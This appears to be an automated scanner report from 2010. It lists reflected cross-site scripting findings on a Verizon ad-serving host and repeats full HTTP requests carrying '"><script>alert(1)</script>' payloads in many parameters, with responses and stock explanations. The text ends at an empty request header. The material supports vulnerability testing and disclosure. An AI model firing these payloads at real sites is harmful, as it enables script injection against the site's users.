GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=91b9e"><script>alert(1)</script>c95b9106569&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77b92"><script>alert(1)</script>a2d570f147e was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=77b92"><script>alert(1)</script>a2d570f147e&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:34 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 830fd"><script>alert(1)</script>3e4bb5b3888 was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=830fd"><script>alert(1)</script>3e4bb5b3888&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1392 Content-Type: text/html Cache-Control: private Content-Length: 1392
The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa0e"><script>alert(1)</script>31b9443c757 was submitted in the viss parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bfa0e"><script>alert(1)</script>31b9443c757&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:32 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the vsbb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f54fd"><script>alert(1)</script>ecbc842c8ef was submitted in the vsbb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=f54fd"><script>alert(1)</script>ecbc842c8ef&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f786"><script>alert(1)</script>f1650cfbf93 was submitted in the webex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=3f786"><script>alert(1)</script>f1650cfbf93&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac813"><script>alert(1)</script>f2c20e38879 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=ac813"><script>alert(1)</script>f2c20e38879&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:55 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6c1b"><script>alert(1)</script>6238df5bdc3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.netb6c1b"><script>alert(1)</script>6238df5bdc3/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:00:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 360 Content-Type: text/html Cache-Control: private Content-Length: 360
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 485c9"><script>alert(1)</script>4b86c156f98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage485c9"><script>alert(1)</script>4b86c156f98/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:00:55 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b232"><script>alert(1)</script>05b5cc07ece was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top6b232"><script>alert(1)</script>05b5cc07ece?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:01:11 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 351 Content-Type: text/html Cache-Control: private Content-Length: 351
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd200"a%3d"b"4f3fa442ed1 was submitted in the REST URL parameter 6. This input was echoed as dd200"a="b"4f3fa442ed1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/dd200"a%3d"b"4f3fa442ed1?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:01:16 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PJclQO20erias|O10escOz; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.verizononline.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1461 Content-Type: text/html Cache-Control: private Content-Length: 1461
The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497e1"><script>alert(1)</script>829630d20ba was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=497e1"><script>alert(1)</script>829630d20ba&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:55:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c9e"><script>alert(1)</script>de0ed8fa512 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=38c9e"><script>alert(1)</script>de0ed8fa512&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:57:19 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9336"><script>alert(1)</script>06f4f26e350 was submitted in the connex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=e9336"><script>alert(1)</script>06f4f26e350&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:51:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde95"><script>alert(1)</script>a822f79e323 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=dde95"><script>alert(1)</script>a822f79e323&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:52:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37937"><script>alert(1)</script>e02e08d3502 was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=37937"><script>alert(1)</script>e02e08d3502&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:53:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b765b"><script>alert(1)</script>85d8bcdeb44 was submitted in the msp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
